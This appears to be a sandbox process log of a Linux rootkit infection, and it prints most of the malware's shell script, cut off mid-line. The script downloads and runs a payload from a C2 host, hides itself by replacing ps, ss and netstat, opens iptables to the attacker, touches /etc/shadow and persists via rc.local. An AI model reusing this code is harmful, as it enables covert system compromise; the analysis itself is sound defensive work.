  cp -f /usr/bin/wget /usr/bin/dget
  2⤵
  - Write file to user bin folder
  PID:2492
- /usr/bin/cp
  cp -f /usr/bin/wget /usr/bin/.bget
  2⤵
  - Write file to user bin folder
  PID:2493
- /usr/bin/cp
  cp -f /usr/bin/.bget /usr/bin/dget
  2⤵
  - Write file to user bin folder
  PID:2494
- /usr/bin/chmod
  chmod 777 /usr/bin/dget
  2⤵
  - File and Directory Permissions Modification
  PID:2495
- /usr/bin/lockr
  lockr +i /usr/bin/dget
  2⤵
  - Executes dropped EXE
  PID:2496
- /usr/bin/lockr
  lockr +i /usr/bin/.bget
  2⤵
  - Executes dropped EXE
  PID:2497
- /usr/bin/lockr
  lockr -i /usr/bin/pkill
  2⤵
  - Executes dropped EXE
  PID:2498
- /usr/bin/chmod
  chmod 777 /usr/bin/pkill
  2⤵
  - File and Directory Permissions Modification
  PID:2499
- /usr/bin/lockr
  lockr +i /usr/bin/pkill
  2⤵
  - Executes dropped EXE
  PID:2500
- /usr/bin/lockr
  lockr -i /usr/bin/nohup
  2⤵
  - Executes dropped EXE
  PID:2501
- /usr/bin/chmod
  chmod 777 /usr/bin/nohup
  2⤵
  - File and Directory Permissions Modification
  PID:2502
- /usr/bin/lockr
  lockr +i /usr/bin/nohup
  2⤵
  - Executes dropped EXE
  PID:2503
- /usr/bin/lockr
  lockr -i /usr/bin/killall
  2⤵
  - Executes dropped EXE
  PID:2504
- /usr/bin/chmod
  chmod 777 /usr/bin/killall
  2⤵
  - File and Directory Permissions Modification
  PID:2505
- /usr/bin/lockr
  lockr +i /usr/bin/killall
  2⤵
  - Executes dropped EXE
  PID:2506
- /usr/bin/lockr
  lockr -i /usr/bin/nslookup
  2⤵
  - Executes dropped EXE
  PID:2507
- /usr/bin/chmod
  chmod 777 /usr/bin/nslookup
  2⤵
  - File and Directory Permissions Modification
  PID:2508
- /usr/bin/lockr
  lockr +i /usr/bin/nslookup
  2⤵
  - Executes dropped EXE
  PID:2509
- /usr/bin/grep
  grep "inet "
  2⤵
  PID:2512
- /usr/bin/grep
  grep -v 127.0
  2⤵
  PID:2513
- /usr/bin/xargs
  xargs
  2⤵
  PID:2514
- - /usr/local/sbin/echo
    echo
    3⤵
    PID:2517
- - /usr/local/bin/echo
    echo
    3⤵
    PID:2517
- - /usr/sbin/echo
    echo
    3⤵
    PID:2517
- - /usr/bin/echo
    echo
    3⤵
    PID:2517
- /usr/bin/awk
  awk -F "[ :]" "{print \$3}"
  2⤵
  PID:2515
- /usr/bin/grep
  grep 192.168
  2⤵
  PID:2516
- /usr/bin/lockr
  lockr -i /usr/bin/
  2⤵
  - Executes dropped EXE
  PID:2518
- /usr/bin/lockr
  lockr -i /etc/init.d/
  2⤵
  - Executes dropped EXE
  PID:2519
- /usr/bin/cat
  cat /etc/long.conf
  2⤵
  PID:2521
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:2522
- /usr/bin/date
  date "+%s%N"
  2⤵
  PID:2524
- /usr/bin/md5sum
  md5sum
  2⤵
  PID:2525
- /usr/bin/head
  head -c 10
  2⤵
  PID:2526
- /usr/bin/cat
  cat /etc/long.conf
  2⤵
  PID:2528
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2529
- /usr/bin/date
  date "+%s%N"
  2⤵
  PID:2531
- /usr/bin/md5sum
  md5sum
  2⤵
  PID:2532
- /usr/bin/head
  head -c 10
  2⤵
  PID:2533
- /usr/bin/nslookup
  nslookup top.t7ux.com
  2⤵
  - Reads CPU attributes
  PID:2535
- /usr/bin/grep
  grep "Address: "
  2⤵
  PID:2536
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2537
- /usr/bin/lockr
  lockr -i /etc/
  2⤵
  - Executes dropped EXE
  PID:2542
- /usr/bin/lockr
  lockr -i /etc/resolv.conf
  2⤵
  - Executes dropped EXE
  PID:2543
- /usr/bin/lockr
  lockr +i /etc/resolv.conf
  2⤵
  - Executes dropped EXE
  PID:2544
- /usr/sbin/service
  service network restart
  2⤵
  PID:2546
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:2547
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:2548
- /usr/local/sbin/systemctl
  systemctl restart network.service
  2⤵
  PID:2546
- /usr/local/bin/systemctl
  systemctl restart network.service
  2⤵
  PID:2546
- /usr/sbin/systemctl
  systemctl restart network.service
  2⤵
  PID:2546
- /usr/bin/systemctl
  systemctl restart network.service
  2⤵
  PID:2546
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:2551
- /usr/bin/nslookup
  nslookup top.t7ux.com
  2⤵
  - Reads CPU attributes
  PID:2553
- /usr/bin/grep
  grep "Address: "
  2⤵
  PID:2554
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2555
- /usr/bin/lockr
  lockr -i /usr/bin/
  2⤵
  - Executes dropped EXE
  PID:2580
- /usr/bin/mkdir
  mkdir /usr/bin/dpkgd/
  2⤵
  PID:2581
- /usr/bin/cp
  cp -f /bin/ss /usr/bin/dpkgd/ss
  2⤵
  - Write file to user bin folder
  PID:2582
- /usr/bin/cp
  cp -f /bin/ss /usr/bin/iss
  2⤵
  - Write file to user bin folder
  PID:2583
- /usr/bin/chmod
  chmod 777 /usr/bin/iss
  2⤵
  - File and Directory Permissions Modification
  PID:2584
- /usr/bin/chmod
  chmod 777 /usr/bin/dpkgd/ss
  2⤵
  - File and Directory Permissions Modification
  PID:2585
- /usr/bin/lockr
  lockr +i /usr/bin/dpkgd/ss
  2⤵
  - Executes dropped EXE
  PID:2586
- /usr/bin/lockr
  lockr +i /usr/bin/iss
  2⤵
  - Executes dropped EXE
  PID:2587
- /usr/bin/lockr
  lockr -i /usr/bin/
  2⤵
  - Executes dropped EXE
  PID:2588
- /usr/bin/mkdir
  mkdir /usr/bin/dpkgd/
  2⤵
  PID:2589
- /usr/bin/cp
  cp -f /bin/ps /usr/bin/dpkgd/ps
  2⤵
  - Write file to user bin folder
  PID:2590
- /usr/bin/cp
  cp -f /bin/ps /usr/bin/ips
  2⤵
  - Write file to user bin folder
  - System Network Configuration Discovery
  PID:2591
- /usr/bin/chmod
  chmod 777 /usr/bin/ips
  2⤵
  - File and Directory Permissions Modification
  PID:2592
- /usr/bin/chmod
  chmod 777 /usr/bin/dpkgd/ps
  2⤵
  - File and Directory Permissions Modification
  PID:2593
- /usr/bin/lockr
  lockr +i /usr/bin/dpkgd/ps
  2⤵
  - Executes dropped EXE
  PID:2594
- /usr/bin/lockr
  lockr +i /usr/bin/ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:2595
- /usr/bin/lockr
  lockr -i /etc/
  2⤵
  - Executes dropped EXE
  PID:2596
- /usr/bin/cp
  cp -f /etc/hosts.deny /etc/deny.bak
  2⤵
  PID:2597
- /usr/bin/lockr
  lockr +i /etc/deny.bak
  2⤵
  - Executes dropped EXE
  PID:2598
- /usr/bin/lockr
  lockr -i /etc/
  2⤵
  - Executes dropped EXE
  PID:2599
- /usr/bin/cp
  cp -f /etc/hosts.allow /etc/allow.bak
  2⤵
  PID:2600
- /usr/bin/lockr
  lockr +i /etc/allow.bak
  2⤵
  - Executes dropped EXE
  PID:2601
- /usr/bin/grep
  grep
  2⤵
  PID:2604
- /usr/bin/grep
  grep ACCEPT
  2⤵
  PID:2605
- /usr/bin/ips
  ips -ef
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:2607
- /usr/bin/grep
  grep byicnanker
  2⤵
  PID:2608
- /usr/bin/grep
  grep -v grep
  2⤵
  PID:2609
- /usr/bin/wc
  wc -l
  2⤵
  PID:2610
- /usr/bin/lockr
  lockr -i /usr/bin/
  2⤵
  - Executes dropped EXE
  PID:2611
- /usr/bin/lockr
  lockr -i /usr/bin/Drkv
  2⤵
  - Executes dropped EXE
  PID:2612
- /usr/bin/rm
  rm -f /usr/bin/Drkv
  2⤵
  PID:2613
- /usr/bin/dget
  dget http://:6513/Drkv
  2⤵
  - Executes dropped EXE
  PID:2614
- /usr/bin/mv
  mv -f /usr/bin/Drkv /usr/bin/b293c49147
  2⤵
  PID:2615
- /usr/bin/grep
  grep :9506
  2⤵
  PID:2618
- /usr/bin/cut
  cut -d / -f 1
  2⤵
  PID:2619
- /usr/bin/awk
  awk "{print \$9}"
  2⤵
  PID:2620
- /usr/bin/killall
  killall byicnanker
  2⤵
  - Reads runtime system information
  PID:2621
- /usr/bin/pkill
  pkill byicnanker
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2622
- /usr/bin/lockr
  lockr -i /usr/bin/
  2⤵
  - Executes dropped EXE
  PID:2623
- /usr/bin/lockr
  lockr -i /usr/bin/byicnanker
  2⤵
  - Executes dropped EXE
  PID:2624
- /usr/bin/rm
  rm -f /usr/bin/byicnanker
  2⤵
  PID:2625
- /usr/bin/cat
  cat /etc/long.conf
  2⤵
  PID:2627
- /usr/bin/grep
  grep byicnanker
  2⤵
  PID:2628
- /usr/bin/lockr
  lockr -i /etc/long.conf
  2⤵
  - Executes dropped EXE
  PID:2629
- /usr/bin/sed
  sed -i "s|byicnanker|b293c49147|" /etc/long.conf
  2⤵
  PID:2630
- /usr/bin/lockr
  lockr +i /etc/long.conf
  2⤵
  - Executes dropped EXE
  PID:2631
- /usr/bin/cat
  cat /bin/ps
  2⤵
  PID:2633
- /usr/bin/grep
  grep byicnanker
  2⤵
  PID:2634
- /usr/bin/lockr
  lockr -i /bin/
  2⤵
  - Executes dropped EXE
  PID:2635
- /usr/bin/lockr
  lockr -i /bin/ps
  2⤵
  - Executes dropped EXE
  PID:2636
- /usr/bin/chmod
  chmod 777 /bin/ps
  2⤵
  - File and Directory Permissions Modification
  PID:2637
- /usr/bin/lockr
  lockr +i /bin/ps
  2⤵
  - Executes dropped EXE
  PID:2638
- /usr/bin/chmod
  chmod 777 /usr/bin/b293c49147
  2⤵
  - File and Directory Permissions Modification
  PID:2639
- /usr/bin/cp
  cp -f /usr/bin/b293c49147 /usr/bin/longbak
  2⤵
  PID:2641
- /usr/bin/nohup
  nohup /usr/bin/b293c49147
  2⤵
  PID:2640
- /usr/bin/chmod
  chmod 777 /usr/bin/longbak
  2⤵
  - File and Directory Permissions Modification
  PID:2642
- /usr/bin/b293c49147
  /usr/bin/b293c49147
  2⤵
  PID:2640
- /usr/bin/lockr
  lockr +i /usr/bin/longbak
  2⤵
  - Executes dropped EXE
  PID:2643
- /usr/bin/cat
  cat /etc/rc.local
  2⤵
  PID:2645
- /usr/bin/grep
  grep start
  2⤵
  PID:2646
- /usr/bin/wc
  wc -l
  2⤵
  PID:2647
- /usr/bin/lockr
  lockr -i /etc/rc.local
  2⤵
  - Executes dropped EXE
  PID:2648
- /usr/bin/sed
  sed -i /start/d /etc/rc.local
  2⤵
  PID:2649
- /usr/bin/cat
  cat /etc/rc.local
  2⤵
  PID:2651
- /usr/bin/grep
  grep /usr/bin/2228668564
  2⤵
  PID:2652
- /usr/bin/cat
  cat /etc/rc.local
  2⤵
  PID:2654
- /usr/bin/grep
  grep "exit 0"
  2⤵
  PID:2655
- /usr/bin/lockr
  lockr -i /etc/
  2⤵
  - Executes dropped EXE
  PID:2656
- /usr/bin/lockr
  lockr -i /etc/rc.local
  2⤵
  - Executes dropped EXE
  PID:2657
- /usr/bin/nslookup
  nslookup sh.7ex.me
  2⤵
  - Reads CPU attributes
  PID:2659
- /usr/bin/grep
  grep "Address: "
  2⤵
  PID:2660
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2661
- /usr/bin/cat
  cat /etc/passwd
  2⤵
  PID:2670
- /usr/bin/grep
  grep icnanker
  2⤵
  PID:2671
- /usr/bin/lockr
  lockr -i /etc/
  2⤵
  - Executes dropped EXE
  PID:2672
- /usr/bin/lockr
  lockr -i /etc/passwd
  2⤵
  - Executes dropped EXE
  PID:2673
- /usr/bin/cat
  cat /etc/shadow
  2⤵
  - OS Credential Dumping
  PID:2675
- /usr/bin/grep
  grep icnanker
  2⤵
  PID:2676
- /usr/bin/lockr
  lockr -i /etc/
  2⤵
  - Executes dropped EXE
  PID:2677
- /usr/bin/lockr
  lockr -i /etc/shadow
  2⤵
  - Executes dropped EXE
  - OS Credential Dumping
  PID:2678
- /usr/bin/killall
  killall .sshd
  2⤵
  - Reads runtime system information
  PID:2679
- /usr/bin/pkill
  pkill .sshd
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2680
- /usr/bin/lockr
  lockr -i /usr/bin/.sshd
  2⤵
  - Executes dropped EXE
  PID:2681
- /usr/bin/rm
  rm -f /usr/bin/.sshd
  2⤵
  PID:2682
- /usr/bin/lockr
  lockr -i /usr/bin/
  2⤵
  - Executes dropped EXE
  PID:2683
- /usr/bin/lockr
  lockr -i /usr/bin/wget
  2⤵
  - Executes dropped EXE
  PID:2684
- /usr/bin/rm
  rm -f /usr/bin/wget
  2⤵
  PID:2685
- /usr/bin/lockr
  lockr -i /usr/bin/chattr
  2⤵
  - Executes dropped EXE
  PID:2686
- /usr/bin/rm
  rm -f /usr/bin/chattr
  2⤵
  PID:2687
- /usr/bin/lockr
  lockr -i /etc/
  2⤵
  - Executes dropped EXE
  PID:2688
- /usr/bin/lockr
  lockr -i /etc/hosts.deny
  2⤵
  - Executes dropped EXE
  PID:2689
- /usr/bin/cp
  cp -f /etc/deny.bak /etc/hosts.deny
  2⤵
  PID:2690
- /usr/bin/lockr
  lockr +i /etc/hosts.deny
  2⤵
  - Executes dropped EXE
  PID:2691
- /usr/bin/lockr
  lockr -i /etc/
  2⤵
  - Executes dropped EXE
  PID:2692
- /usr/bin/lockr
  lockr -i /etc/hosts.allow
  2⤵
  - Executes dropped EXE
  PID:2693
- /usr/bin/cp
  cp -f /etc/allow.bak /etc/hosts.allow
  2⤵
  PID:2694
- /usr/bin/lockr
  lockr +i /etc/hosts.allow
  2⤵
  - Executes dropped EXE
  PID:2695
- /usr/bin/lockr
  lockr -i /etc/init.d/
  2⤵
  - Executes dropped EXE
  PID:2696
- /usr/bin/lockr
  lockr -i /etc/long.conf
  2⤵
  - Executes dropped EXE
  PID:2697
- /usr/bin/sed
  sed -i "s|2228668564|f24a684025|" /etc/long.conf
  2⤵
  PID:2698
- /usr/bin/lockr
  lockr +i /etc/long.conf
  2⤵
  - Executes dropped EXE
  PID:2699
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:2700
- /usr/bin/lockr
  lockr -i /usr/bin/
  2⤵
  - Executes dropped EXE
  PID:2701
- /usr/bin/cp
  cp -f /tmp/rootkit /usr/bin/f24a684025
  2⤵
  - Write file to user bin folder
  PID:2702
- /usr/bin/chmod
  chmod 777 /usr/bin/f24a684025
  2⤵
  - File and Directory Permissions Modification
  PID:2703
- /usr/bin/lockr
  lockr -i /bin/
  2⤵
  - Executes dropped EXE
  PID:2705
- /usr/bin/nohup
  nohup /usr/bin/f24a684025
  2⤵
  PID:2704
- /usr/bin/f24a684025
  /usr/bin/f24a684025
  2⤵
  - Executes dropped EXE
  PID:2704
- /usr/bin/lockr
  lockr -i /bin/ps
  2⤵
  - Executes dropped EXE
  PID:2706
- /usr/bin/sed
  sed -i "s|2228668564|f24a684025|" /bin/ps
  2⤵
  - Writes file to system bin folder
  PID:2707
- /usr/bin/lockr
  lockr +i /bin/ps
  2⤵
  PID:2708
- /bin/sh
  /usr/bin/f24a684025 -c "exec '/usr/bin/f24a684025' \"\$@\"" /usr/bin/f24a684025
  2⤵
  PID:2704
- /usr/bin/f24a684025
  /usr/bin/f24a684025
  2⤵
  PID:2704
- /usr/bin/lockr
  lockr -i /etc/
  2⤵
  PID:2709
- /usr/bin/lockr
  lockr -i /etc/rc.local
  2⤵
  PID:2710
- /usr/bin/sed
  sed -i "s|/usr/bin/2228668564 start|/usr/bin/f24a684025 start|" /etc/rc.local
  2⤵
  PID:2711
- /bin/sh
  /usr/bin/f24a684025 -c "#!/bin/sh path=`pwd` exit0=\"exit 0\" ips=\"/usr/bin/ips\" iss=\"/usr/bin/iss\" Net=\"/usr/bin/nets\" Get=\"/usr/bin/dget\" Lok=\"/usr/bin/lockr\" deny=\"/etc/deny.bak\" allow=\"/etc/allow.bak\" Config=\"/etc/long.conf\" filebak=\"/usr/bin/longbak\" issbak=\"/usr/bin/dpkgd/ss\" ipsbak=\"/usr/bin/dpkgd/ps\" Netbak=\"/usr/bin/dpkgd/netstat\" Runkillallconnect() { killpid=`nets -anept 2>/dev/null|grep \"\$Address:9506\"|cut -d / -f 1|awk '{print \$9}'` kill \$killpid 2>/dev/null;kill -3 \$killpid 2>/dev/null;kill -9 \$killpid 2>/dev/null killall \$tempfile;pkill \$tempfile;lockr -i /usr/bin/;lockr -i \$filetemp;rm -f \$filetemp if [ -z \"`cat \$Config|grep \$tempfile`\" ]; then lockr -i /etc/init.d/;lockr -i \$Config echo \$filename \$tempbash \$Address > \$Config;lockr +i \$Config >/dev/null 2>&1 else lockr -i \$Config;sed -i \"s|\$tempfile|\$filename|\" \$Config;lockr +i \$Config >/dev/null 2>&1 fi if [ -z \"`cat /bin/ps|grep \$tempfile`\" ]; then lockr -i /bin/;lockr -i /bin/ps;echo '#!/bin/sh' > /bin/ps;echo 'for arg in \"\$*\";do' >> /bin/ps echo 'ips \$arg|grep -v \"'\$tempbash'\"|grep -v \"'\$filename'\"|grep -v \"ips\"|grep -v \"grep\"' >> /bin/ps echo 'done;exit' >> /bin/ps;chmod 777 /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 else lockr -i /bin/ps;sed -i \"s|\$tempfile|\$filename|\" /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 fi } # ------------------------------------------------------------- if [ ! -f \"\$Lok\" ];then lockr -i /usr/bin/ if [ ! -f /usr/bin/wget ];then if [ -f /usr/bin/yum ];then yum -y install e2fsprogs;fi if [ -f /usr/bin/apt-get ];then apt-get -y install e2fsprogs;fi fi cp -f /usr/bin/chattr /usr/bin/lockr cp -f /usr/bin/chattr /usr/bin/.locks cp -f /usr/bin/.locks /usr/bin/lockr chmod 777 /usr/bin/lockr chmod 777 /usr/bin/.locks lockr +i /usr/bin/lockr >/dev/null 2>&1 lockr +i /usr/bin/.locks >/dev/null 2>&1 else .locks -i /usr/bin/lockr;chmod 777 /usr/bin/lockr lockr +i /usr/bin/lockr >/dev/null 2>&1 fi if [ ! -f \"\$Get\" ];then lockr -i /usr/bin/ if [ ! -f /usr/bin/wget ];then if [ -f /usr/bin/yum ];then yum -y install wget;fi if [ -f /usr/bin/apt-get ];then apt-get -y install wget;fi fi cp -f /usr/bin/wget /usr/bin/dget cp -f /usr/bin/wget /usr/bin/.bget cp -f /usr/bin/.bget /usr/bin/dget chmod 777 /usr/bin/dget lockr +i /usr/bin/dget >/dev/null 2>&1 lockr +i /usr/bin/.bget >/dev/null 2>&1 else lockr -i /usr/bin/dget;chmod 777 /usr/bin/dget lockr +i /usr/bin/dget >/dev/null 2>&1 fi if [ -f /usr/bin/pkill ];then lockr -i /usr/bin/pkill;chmod 777 /usr/bin/pkill lockr +i /usr/bin/pkill >/dev/null 2>&1 fi if [ -f /usr/bin/nohup ];then lockr -i /usr/bin/nohup;chmod 777 /usr/bin/nohup lockr +i /usr/bin/nohup >/dev/null 2>&1 fi if [ -f /usr/bin/killall ];then lockr -i /usr/bin/killall;chmod 777 /usr/bin/killall lockr +i /usr/bin/killall >/dev/null 2>&1 fi if [ -f /usr/bin/nslookup ];then lockr -i /usr/bin/nslookup;chmod 777 /usr/bin/nslookup lockr +i /usr/bin/nslookup >/dev/null 2>&1 fi if [ -f /etc/init.d/Me8ing.conf ];then Runkillallconnect rm -f \$0;exit fi # ------------------------------------------------------------- if [ ! -f \"\$Config\" ];then intranet=`ifconfig|grep 'inet '|grep -v '127.0'|xargs|awk -F '[ :]' '{print \$3}'|grep '192.168'` if [ \$intranet ];then exit;fi lockr -i /usr/bin/;lockr -i /etc/init.d/ echo \"byicnanker 2228668564\" > \$Config tempfile=`cat \$Config | awk '{print \$1}'` filetemp=\"/usr/bin/\$tempfile\" #��·�� filename=`date +%s%N | md5sum | head -c 10` filepath=\"/usr/bin/\$filename\" #��·�� tempbash=`cat \$Config | awk '{print \$2}'` bashtemp=\"/usr/bin/\$tempbash\" #�ֽű�·�� bashname=`date +%s%N | md5sum | head -c 10` bashpath=\"/usr/bin/\$bashname\" #�½ű�·�� else tempfile=`cat \$Config | awk '{print \$1}'` filetemp=\"/usr/bin/\$tempfile\" #��·�� filename=`date +%s%N | md5sum | head -c 10` filepath=\"/usr/bin/\$filename\" #��·�� tempbash=`cat \$Config | awk '{print \$2}'` bashtemp=\"/usr/bin/\$tempbash\" #�ֽű�·�� bashname=`date +%s%N | md5sum | head -c 10` bashpath=\"/usr/bin/\$bashname\" #�½ű�·�� if [ \$0 != \"\$bashtemp\" ];then lockr -i /usr/bin/;lockr -i /bin/ KA=`cat \$Config | awk '{print \$1}'` KPidA=`ips -ef|grep \$KA|awk '{print \$2}'` lockr -i /usr/bin/\$KA;rm -f /usr/bin/\$KA kill \$KPidA 2>/dev/null;kill -9 \$KPidA 2>/dev/null lockr -i \$filetemp;rm -f \$filetemp;lockr -i \$filebak;rm -f \$filebak killall .sshd;pkill .sshd;lockr -i /usr/bin/.sshd;rm -f /usr/bin/.sshd killall \$KA;pkill \$KA;killall \$KA;pkill \$KA;sleep 0.1 K1=`cat \$Config | awk '{print \$2}'` KPid1=`ips -ef|grep \$K1|awk '{print \$2}'` kill \$KPid1 2>/dev/null;kill -9 \$KPid1 2>/dev/null lockr -i /usr/bin/\$K1;rm -f /usr/bin/\$K1 killall \$K1;pkill \$K1;killall \$K1;pkill \$K1;sleep 0.4 K2=`cat \$Config | awk '{print \$2}'` KPid2=`ips -ef|grep \$K2|awk '{print \$2}'` kill \$KPid2 2>/dev/null;kill -9 \$KPid2 2>/dev/null lockr -i /usr/bin/\$K2;rm -f /usr/bin/\$K2 killall \$K2;pkill \$K2;killall \$K2;pkill \$K2;sleep 1.2 K3=`cat \$Config | awk '{print \$2}'` KPid3=`ips -ef|grep \$K3|awk '{print \$2}'` kill \$KPid3 2>/dev/null;kill -9 \$KPid3 2>/dev/null lockr -i /usr/bin/\$K3;rm -f /usr/bin/\$K3 killall \$K3;pkill \$K3;killall \$K3;pkill \$K3;sleep 0.5 K4=`cat \$Config | awk '{print \$2}'` KPid4=`ips -ef|grep \$K4|awk '{print \$2}'` kill \$KPid4 2>/dev/null;kill -9 \$KPid4 2>/dev/null lockr -i /usr/bin/\$K4;rm -f /usr/bin/\$K4 killall \$K4;pkill \$K4;killall \$K4;pkill \$K4;sleep 1.3 K5=`cat \$Config | awk '{print \$2}'` KPid5=`ips -ef|grep \$K5|awk '{print \$2}'` kill \$KPid5 2>/dev/null;kill -9 \$KPid5 2>/dev/null lockr -i /usr/bin/\$K5;rm -f /usr/bin/\$K5 killall \$K5;pkill \$K5;killall \$K5;pkill \$K5;sleep 0.6 K6=`cat \$Config | awk '{print \$2}'` KPid6=`ips -ef|grep \$K6|awk '{print \$2}'` kill \$KPid6 2>/dev/null;kill -9 \$KPid6 2>/dev/null lockr -i /usr/bin/\$K6;rm -f /usr/bin/\$K6 killall \$K6;pkill \$K6;killall \$K6;pkill \$K6;sleep 1.4 K7=`cat \$Config | awk '{print \$2}'` KPid7=`ips -ef|grep \$K7|awk '{print \$2}'` kill \$KPid7 2>/dev/null;kill -9 \$KPid7 2>/dev/null lockr -i /usr/bin/\$K7;rm -f /usr/bin/\$K7 killall \$K7;pkill \$K7;killall \$K7;pkill \$K7;sleep 0.1 lockr -i \$Config;sed -i \"s|\$tempbash|\$bashname|\" \$Config lockr -i /bin/ps;sed -i \"s|\$tempbash|\$bashname|\" /bin/ps fi fi # ------------------------------------------------------------- if [ ! -f /usr/bin/nslookup ];then if [ -f /usr/bin/apt-get ];then apt-get -y install dnsutils;fi if [ -f /usr/bin/yum ];then yum -y install bind-utils;fi fi ResolveIP=`nslookup top.t7ux.com|grep \"Address: \"|awk '{print \$2}'` if [ -z \"\$ResolveIP\" ];then lockr -i /etc/;lockr -i /etc/resolv.conf echo 'nameserver 114.114.114.114' > /etc/resolv.conf echo 'nameserver 8.8.8.8' >> /etc/resolv.conf echo 'nameserver 8.8.4.4' >> /etc/resolv.conf lockr +i /etc/resolv.conf >/dev/null 2>&1 service network restart;sleep 1 Address=`nslookup top.t7ux.com|grep \"Address: \"|awk '{print \$2}'` else Address=\"\$ResolveIP\" fi # ------------------------------------------------------------- if [ -f /bin/ss ];then if [ ! -f \"\$iss\" ];then if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/ss \$issbak cp -f /bin/ss \$iss else cp -f \$issbak \$iss fi chmod 777 \$iss;chmod 777 \$issbak lockr +i \$issbak >/dev/null 2>&1 lockr +i \$iss >/dev/null 2>&1 else if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;cp -f \$iss \$issbak lockr +i \$issbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/ss | grep \$Address`\" ]; then lockr -i /bin/;lockr -i /bin/ss echo '#!/bin/sh' > /bin/ss echo 'iss|grep -v \"'\$Address'\"' >> /bin/ss echo 'exit' >> /bin/ss chmod 777 /bin/ss;lockr +i /bin/ss >/dev/null 2>&1 fi fi fi if [ -f /usr/sbin/ss ];then if [ ! -f \"\$iss\" ];then if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /usr/sbin/ss \$issbak cp -f /usr/sbin/ss \$iss else cp -f \$issbak \$iss fi chmod 777 \$iss;chmod 777 \$issbak lockr +i \$issbak >/dev/null 2>&1 lockr +i \$iss >/dev/null 2>&1 else if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;cp -f \$iss \$issbak lockr +i \$issbak >/dev/null 2>&1 fi if [ -z \"`cat /usr/sbin/ss | grep \$Address`\" ]; then lockr -i /usr/sbin/;lockr -i /usr/sbin/ss echo '#!/bin/sh' > /usr/sbin/ss echo 'iss|grep -v \"'\$Address'\"' >> /usr/sbin/ss echo 'exit' >> /usr/sbin/ss chmod 777 /usr/sbin/ss;lockr +i /usr/sbin/ss >/dev/null 2>&1 fi fi fi if [ -f /bin/netstat ];then if [ ! -f \"\$Net\" ];then if [ ! -f \"\$Netbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/netstat \$Netbak cp -f /bin/netstat \$Net else cp -f \$Netbak \$Net fi chmod 777 \$Net;chmod 777 \$Netbak lockr +i \$Netbak >/dev/null 2>&1 lockr +i \$Net >/dev/null 2>&1 else if [ ! -f \"\$Netbak\" ];then lockr -i /usr/bin/;cp -f \$Net \$Netbak lockr +i \$Netbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/netstat | grep \$Address`\" ]; then lockr -i /bin/;lockr -i /bin/netstat echo '#!/bin/sh' > /bin/netstat echo 'for arg in \"\$*\";do' >> /bin/netstat echo 'nets \$arg | grep -v \"'\$Address'\"' >> /bin/netstat echo 'done;exit' >> /bin/netstat chmod 777 /bin/netstat;lockr +i /bin/netstat >/dev/null 2>&1 fi fi fi if [ -f /bin/ps ];then if [ ! -f \"\$ips\" ];then if [ ! -f \"\$ipsbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/ps \$ipsbak cp -f /bin/ps \$ips else cp -f \$ipsbak \$ips fi chmod 777 \$ips;chmod 777 \$ipsbak lockr +i \$ipsbak >/dev/null 2>&1 lockr +i \$ips >/dev/null 2>&1 else if [ ! -f \"\$ipsbak\" ];then lockr -i /usr/bin/;cp -f \$ips \$ipsbak lockr +i \$ipsbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/ps | grep '#!/bin/sh'`\" ]; then lockr -i /bin/;lockr -i /bin/ps echo '#!/bin/sh' > /bin/ps;echo 'for arg in \"\$*\";do' >> /bin/ps echo 'ips \$arg | grep -v \"'\$tempbash'\" | grep -v \"'\$tempfile'\" | grep -v \"ips\" | grep -v \"grep\"' >> /bin/ps echo 'done;exit' >> /bin/ps;chmod 777 /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 fi fi fi if [ ! -f \"\$deny\" ];then lockr -i /etc/;cp -f /etc/hosts.deny \$deny lockr +i \$deny >/dev/null 2>&1 fi if [ ! -f \"\$allow\" ];then lockr -i /etc/;cp -f /etc/hosts.allow \$allow lockr +i \$allow >/dev/null 2>&1 fi # by icnanker ----------------------------------------------- iptable=`iptables -L INPUT | grep \"\$Address\" | grep 'ACCEPT'` if [ -z \"\$iptable\" ];then iptables -I INPUT -s \$Address -j ACCEPT else iptables -D INPUT -s \$Address -j DROP fi process=`ips -ef | grep \"\$tempfile\" | grep -v \"grep\" | wc -l` if [ \$process != 1 ];then if [ ! -f \"\$filebak\" ];then lockr -i /usr/bin/;lockr -i /usr/bin/Drkv;rm -f /usr/bin/Drkv cd /usr/bin/;dget http://\$Address:6513/Drkv cd \$path;mv -f /usr/bin/Drkv \$filepath else cp -f \$filebak \$filepath fi Runkillallconnect chmod 777 \$filepath nohup \$filepath >/dev/null 2>&1 & fi if [ ! -f \"\$filebak\" ];then cp -f \$filepath \$filebak;chmod 777 \$filebak lockr +i \$filebak >/dev/null 2>&1 fi # by icnanker ----------------------------------------------- Repeatstart=`cat /etc/rc.local | grep 'start'| wc -l` if [ \$Repeatstart != 1 ];then lockr -i /etc/rc.local;sed -i '/start/d' /etc/rc.local fi if [ -z \"`cat /etc/rc.local | grep \"\$bashtemp\"`\" ]; then if [ -z \"`cat 